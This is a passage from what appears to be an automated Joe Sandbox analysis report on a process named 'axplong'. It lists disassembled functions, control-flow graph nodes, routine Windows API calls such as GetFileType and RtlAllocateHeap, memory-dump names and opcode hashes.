                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                        • API String ID: 1721193555-2057465332
                                        • Opcode ID: 6637d093edc8cb564166815419777285d897dc5c560fd42cddaa2c9618472043
                                        • Instruction ID: ee985ec1b5b1516e2465fef58422cdba69c6f4bdee06230b5551153ec454a005
                                        • Opcode Fuzzy Hash: 6637d093edc8cb564166815419777285d897dc5c560fd42cddaa2c9618472043
                                        • Instruction Fuzzy Hash: 7ED13870E00614A7DB14BB29CE4A39E7B71AB42314F5442AEE405773C2EB7C5E808BDB
                                        Function 00436E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1154 436e01-436e36 GetFileType 1155 436eee-436ef1 1154->1155 1156 436e3c-436e47 1154->1156 1157 436ef3-436ef6 1155->1157 1158 436f1a-436f42 1155->1158 1159 436e69-436e85 call 434020 GetFileInformationByHandle 1156->1159 1160 436e49-436e5a call 437177 1156->1160 1157->1158 1161 436ef8-436efa 1157->1161 1163 436f44-436f57 1158->1163 1164 436f5f-436f61 1158->1164 1167 436f0b-436f18 call 43740d 1159->1167 1175 436e8b-436ecd call 4370c9 call 436f71 * 3 1159->1175 1171 436e60-436e67 1160->1171 1172 436f07-436f09 1160->1172 1161->1167 1168 436efc-436f01 call 437443 1161->1168 1163->1164 1177 436f59-436f5c 1163->1177 1166 436f62-436f70 call 41cf21 1164->1166 1167->1172 1168->1172 1171->1159 1172->1166 1190 436ed2-436eea call 437096 1175->1190 1177->1164 1190->1164 1193 436eec 1190->1193 1193->1172
                                        APIs
                                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00436E23
                                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00436E7D
                                        • __dosmaperr.LIBCMT ref: 00436F12
                                          • Part of subcall function 00437177: __dosmaperr.LIBCMT ref: 004371AC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File__dosmaperr$HandleInformationType
                                        • String ID:
                                        • API String ID: 2531987475-0
                                        • Opcode ID: 68ecb1ab37866ab99bb11ce9c88822cc33227497e16e7586a78bdd0a05a16db6
                                        • Instruction ID: 66dac64a4f261cd34776ec1095d8f6b83c2048261d02eb10cefc1d88089432cb
                                        • Opcode Fuzzy Hash: 68ecb1ab37866ab99bb11ce9c88822cc33227497e16e7586a78bdd0a05a16db6
                                        • Instruction Fuzzy Hash: 47415D75900205BBDB24EFB5EC459ABBBF9EF88304B11952EF556D3210E638A904CB25
                                        Function 0043D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1378 43d4f4-43d515 call 41deb0 1381 43d517 1378->1381 1382 43d52f-43d532 1378->1382 1383 43d519-43d51f 1381->1383 1384 43d54e-43d55a call 43a688 1381->1384 1382->1384 1385 43d534-43d537 1382->1385 1387 43d543-43d54c call 43d43c 1383->1387 1388 43d521-43d525 1383->1388 1396 43d564-43d570 call 43d47e 1384->1396 1397 43d55c-43d55f 1384->1397 1385->1387 1389 43d539-43d53c 1385->1389 1400 43d58c-43d595 1387->1400 1388->1384 1392 43d527-43d52b 1388->1392 1393 43d572-43d582 call 437443 call 436b8a 1389->1393 1394 43d53e-43d541 1389->1394 1392->1393 1398 43d52d 1392->1398 1393->1397 1394->1387 1394->1393 1396->1393 1411 43d584-43d589 1396->1411 1401 43d6cb-43d6da 1397->1401 1398->1387 1404 43d5a2-43d5b3 1400->1404 1405 43d597-43d59f call 438c8b 1400->1405 1409 43d5b5-43d5c7 1404->1409 1410 43d5c9 1404->1410 1405->1404 1414 43d5cb-43d5dc 1409->1414 1410->1414 1411->1400 1415 43d64a-43d65a call 43d687 1414->1415 1416 43d5de-43d5e0 1414->1416 1427 43d6c9 1415->1427 1428 43d65c-43d65e 1415->1428 1418 43d5e6-43d5e8 1416->1418 1419 43d6db-43d6dd 1416->1419 1421 43d5f4-43d600 1418->1421 1422 43d5ea-43d5ed 1418->1422 1423 43d6e7-43d6fa call 43651d 1419->1423 1424 43d6df-43d6e6 call 438cd3 1419->1424 1430 43d602-43d617 call 43d4eb * 2 1421->1430 1431 43d640-43d648 1421->1431 1422->1421 1429 43d5ef-43d5f2 1422->1429 1444 43d708-43d70e 1423->1444 1445 43d6fc-43d706 1423->1445 1424->1423 1427->1401 1434 43d660-43d676 call 43a531 1428->1434 1435 43d699-43d6a2 1428->1435 1429->1421 1436 43d61a-43d61c 1429->1436 1430->1436 1431->1415 1454 43d6a5-43d6a8 1434->1454 1435->1454 1436->1431 1438 43d61e-43d62e 1436->1438 1443 43d630-43d635 1438->1443 1443->1415 1449 43d637-43d63e 1443->1449 1451 43d710-43d711 1444->1451 1452 43d727-43d738 RtlAllocateHeap 1444->1452 1445->1444 1450 43d73c-43d747 call 437443 1445->1450 1449->1443 1462 43d749-43d74b 1450->1462 1451->1452 1455 43d713-43d71a call 439c81 1452->1455 1456 43d73a 1452->1456 1459 43d6b4-43d6bc 1454->1459 1460 43d6aa-43d6ad 1454->1460 1455->1450 1468 43d71c-43d725 call 438cf9 1455->1468 1456->1462 1459->1427 1465 43d6be-43d6c6 call 43a531 1459->1465 1460->1459 1464 43d6af-43d6b2 1460->1464 1464->1427 1464->1459 1465->1427 1468->1450 1468->1452
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: hpGC
                                        • API String ID: 0-3687489864
                                        • Opcode ID: ddd3190556338c3d13818b7ced33b76726a6a14bcc24770c5eb8960b46649a3f
                                        • Instruction ID: aea530a4c474ee2df773fe41081c301fc368a2494489c52d42208a92f3998772
                                        • Opcode Fuzzy Hash: ddd3190556338c3d13818b7ced33b76726a6a14bcc24770c5eb8960b46649a3f
                                        • Instruction Fuzzy Hash: A2612672D00214ABDF259FA8F8866EEB7B0AF5D319F24612BE454A7350D7388C01CB5E
                                        Function 004082B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1472 4082b0-408331 call 434020 1476 408333-408338 1472->1476 1477 40833d-408365 call 417870 call 405b20 1472->1477 1478 40847f-40849b call 41cf21 1476->1478 1485 408367 1477->1485 1486 408369-40838b call 417870 call 405b20 1477->1486 1485->1486 1491 40838d 1486->1491 1492 40838f-4083a8 1486->1492 1491->1492 1495 4083d9-408404 1492->1495 1496 4083aa-4083b9 1492->1496 1497 408431-408452 1495->1497 1498 408406-408415 1495->1498 1499 4083bb-4083c9 1496->1499 1500 4083cf-4083d6 call 41d593 1496->1500 1504 408454-408456 GetNativeSystemInfo 1497->1504 1505 408458-40845d 1497->1505 1502 408427-40842e call 41d593 1498->1502 1503 408417-408425 1498->1503 1499->1500 1506 40849c-4084a1 call 436b9a 1499->1506 1500->1495 1502->1497 1503->1502 1503->1506 1510 40845e-408465 1504->1510 1505->1510 1510->1478 1514 408467-40846f 1510->1514 1515 408471-408476 1514->1515 1516 408478-40847b 1514->1516 1515->1478 1516->1478 1517 40847d 1516->1517 1517->1478
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00408454
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: d626654a65a42354bbc7b6c64a40c9a5777633f9d88448e4e216e3b1317f4be6
                                        • Instruction ID: 43761fb483e5d2f1715a3f771a4cbac2680b13be870cbeec4c847210e353bd33
                                        • Opcode Fuzzy Hash: d626654a65a42354bbc7b6c64a40c9a5777633f9d88448e4e216e3b1317f4be6
                                        • Instruction Fuzzy Hash: 19512870D04208ABEB14EF68CE45BDEB775DB45314F5042BEE844B72C1EF395A848B99
                                        Function 00436C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1518 436c99-436ca5 1519 436ca7-436cc3 call 437430 call 437443 call 436b8a 1518->1519 1520 436cc4-436ce8 call 434020 1518->1520 1526 436d06-436d28 CreateFileW 1520->1526 1527 436cea-436d04 call 437430 call 437443 call 436b8a 1520->1527 1528 436d2a-436d2e call 436e01 1526->1528 1529 436d38-436d3f call 436d77 1526->1529 1550 436d72-436d76 1527->1550 1536 436d33-436d36 1528->1536 1540 436d40-436d42 1529->1540 1536->1540 1542 436d64-436d67 1540->1542 1543 436d44-436d61 call 434020 1540->1543 1546 436d70 1542->1546 1547 436d69-436d6f 1542->1547 1543->1542 1546->1550 1547->1546
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a87a64f31fd4dbfaa0916928f8d21724aa07f892415060f3723ce2adca2d8af
                                        • Instruction ID: 7cdb8b7e8c8278730c9add57993826d9c0d4b611dc04c6fb00d2d3e3edf91d76
                                        • Opcode Fuzzy Hash: 0a87a64f31fd4dbfaa0916928f8d21724aa07f892415060f3723ce2adca2d8af
                                        • Instruction Fuzzy Hash: 4F217F71A012097AEB117B659C42B9F37299F4533CF229316F9343B2C1D7786D0196A9
                                        Function 00436F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1552 436f71-436f87 1553 436f97-436fa7 1552->1553 1554 436f89-436f8d 1552->1554 1559 436fe7-436fea 1553->1559 1560 436fa9-436fbb SystemTimeToTzSpecificLocalTime 1553->1560 1554->1553 1555 436f8f-436f95 1554->1555 1556 436fec-436ff7 call 41cf21 1555->1556 1559->1556 1560->1559 1562 436fbd-436fdd call 436ff8 1560->1562 1564 436fe2-436fe5 1562->1564 1564->1556
                                        APIs
                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00436FB3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$LocalSpecificSystem
                                        • String ID:
                                        • API String ID: 2574697306-0
                                        • Opcode ID: 5a01727589e290f2436a533912c5c292fffbcc10ff456d2da3c6eea13f51b3e8
                                        • Instruction ID: 0f858af501730c99038429961c3c26a9ee4ca84e323eb1993ac50de5b0ed1dd2
                                        • Opcode Fuzzy Hash: 5a01727589e290f2436a533912c5c292fffbcc10ff456d2da3c6eea13f51b3e8
                                        • Instruction Fuzzy Hash: 031136B290020DBADB10DE91D984EDFB7BCAB0C314F219266E512E2180EB34EB458B65
                                        Function 0043D6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1565 43d6ef-43d6fa 1566 43d708-43d70e 1565->1566 1567 43d6fc-43d706 1565->1567 1569 43d710-43d711 1566->1569 1570 43d727-43d738 RtlAllocateHeap 1566->1570 1567->1566 1568 43d73c-43d747 call 437443 1567->1568 1576 43d749-43d74b 1568->1576 1569->1570 1572 43d713-43d71a call 439c81 1570->1572 1573 43d73a 1570->1573 1572->1568 1578 43d71c-43d725 call 438cf9 1572->1578 1573->1576 1578->1568 1578->1570
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0043A5ED,?,004374AE,?,00000000,?), ref: 0043D730
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: f282e2b7823cb6033aaf28996d67fd67198a3845bc2ba5f4e79b4842a319ffdf
                                        • Instruction ID: 4e07c5d8f8d354d0f1e07c46279c1aa42674ad15849b4d2cba94089b314ce510
                                        • Opcode Fuzzy Hash: f282e2b7823cb6033aaf28996d67fd67198a3845bc2ba5f4e79b4842a319ffdf
                                        • Instruction Fuzzy Hash: D0F0BB31E49125569B213A267C0165B77959B89760F257127FC0496281CB68DC0042E9
                                        Function 00416AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 6e9a8a156124c647e1f92732b7ce958c887cdfd675f7e02ce7ca1f972c843353
                                        • Instruction ID: 56fdb827f95acd8da5a67dbf87cc311c7affdc1f3594a97fadd8d08855d06889
                                        • Opcode Fuzzy Hash: 6e9a8a156124c647e1f92732b7ce958c887cdfd675f7e02ce7ca1f972c843353
                                        • Instruction Fuzzy Hash: DAF0D671E00614BBC7007B699D0675E7B74E707B64F90035EE811672D1EA786A008BDB
                                        Function 04B303E3 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4fb9c200d6cee775470199f85781aabb6a02c962bd08e61ac4c6ac90eb259324
                                        • Instruction ID: 25bbce27e92a249f37e421a53e02193277ed59bd20e81437c8da01c7d81c1873
                                        • Opcode Fuzzy Hash: 4fb9c200d6cee775470199f85781aabb6a02c962bd08e61ac4c6ac90eb259324
                                        • Instruction Fuzzy Hash: AE217FEB24C1107E7142A19B2B54AF677BEE9D763133184A6F403C690AF2945F5D7131
                                        Function 04B303DE Relevance: .1, Instructions: 142COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12f15e27632a817e55f08c66b70ec771088acb67126c75fc72ba04d972fb5d36
                                        • Instruction ID: fff9e43fb9bea6955b8728b343d068b045f74df750604670017d1ad67b5aee74
                                        • Opcode Fuzzy Hash: 12f15e27632a817e55f08c66b70ec771088acb67126c75fc72ba04d972fb5d36
                                        • Instruction Fuzzy Hash: 5A212CEB28C120BD3042A18B2B55AF6767EE9D7732331C4A7B407D590AF2985F5D7132
                                        Function 04B303FF Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2ce61ea1fa7a09ff8fd15e6b39d6375c7b589dfa1ec73996f22e9772e875e49
                                        • Instruction ID: b29a2e5fddd89cf84f30cdfad0cf5c74c936bc92426c06d953b97c0952c04a73
                                        • Opcode Fuzzy Hash: c2ce61ea1fa7a09ff8fd15e6b39d6375c7b589dfa1ec73996f22e9772e875e49
                                        • Instruction Fuzzy Hash: 42213EEB28C1207D3042A18B2B69AF67A6EE9D777133184A7F407C5906B2985B5D7132
                                        Function 04B3040E Relevance: .1, Instructions: 135COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dfea17e3b373f1837258c3a915418ed31bb555a47788eb88e4130022aaf8dfc
                                        • Instruction ID: ad9b5c707ce10b108c5fa7fc2b6ace4deec01795460a8e8b0723448a60ca02fb
                                        • Opcode Fuzzy Hash: 5dfea17e3b373f1837258c3a915418ed31bb555a47788eb88e4130022aaf8dfc
                                        • Instruction Fuzzy Hash: 53215CEB28C120BD7042A58B2B58AF67B6EE9D76313318867F407C5906F2885B5D7132
                                        Function 04B304C5 Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d3e1bc27c86ed5cb54d78d648ea75635053559661036775e4632dea29610a24
                                        • Instruction ID: 7eef0ff946991ff0c16638894456f12493b26b758e1e91dcb43aed447a2caf1a
                                        • Opcode Fuzzy Hash: 7d3e1bc27c86ed5cb54d78d648ea75635053559661036775e4632dea29610a24
                                        • Instruction Fuzzy Hash: FA21D4EB24C1107E7142A18B2B94AF67B7EE9D363133184A7F443C6506F2885F5E7132
                                        Function 04B30447 Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 417b75266a4959fabeab31c9389bf9beb591401c5118246736b541cf4f5f3955
                                        • Instruction ID: 55b27151759507764c296d3b2e9bd0a577481fa1570ad4611f44f7ed2d76576a
                                        • Opcode Fuzzy Hash: 417b75266a4959fabeab31c9389bf9beb591401c5118246736b541cf4f5f3955
                                        • Instruction Fuzzy Hash: F01193EB24C1147D3041A19B2B99BF67A6EE9D76313318467F403D6A07F2895F5D7032
                                        Function 04B30438 Relevance: .1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
